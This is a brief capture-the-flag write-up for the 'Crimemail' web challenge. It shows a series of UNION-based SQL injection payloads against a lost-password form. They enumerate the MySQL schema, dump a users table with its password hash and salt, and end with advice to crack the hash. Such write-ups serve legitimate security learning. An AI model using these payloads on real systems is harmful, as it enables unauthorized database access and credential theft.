INS'HACK CTF Write up
2018. 4. 8. 20:52
Crimemail (web)
A SQL injection vulnerability exists in the Lost Password feature.
username=aa' UNION ALL SELECT CONCAT(0x71706a7071,0x44635a76516b464e54626c766b6b56796843685a5650546c52427a6b6a69626a4c576b65776f5041,0x7171717071)#
username=aa' UNION ALL SELECT 1#
-> 1
aa' UNION ALL SELECT @@version#
-> 5.7.21-0ubuntu0.16.04.1
aa' union all select info from information_schema.processlist#
-> SELECT hint FROM users WHERE username='aa' union all select info from information_schema.processlist#'
aa' union all select database()#
-> db
aa' union all select concat(table_name,"\n") from information_schema.tables where table_schema=database()#
-> users
aa' union all select column_name from information_schema.columns where table_name='users'#
-> userID, username, pass_salt, pass_md5, hint
aa' union all select concat(userID, "|", username, "|", pass_salt, "|", pass_md5, "|", hint) as a from users#
-> 5|c.hackle|yhbG|f2b31b3a7a7c41093321d0c98c37f5ad|I don't need any hints man!
From there, just look up the MD5 hash.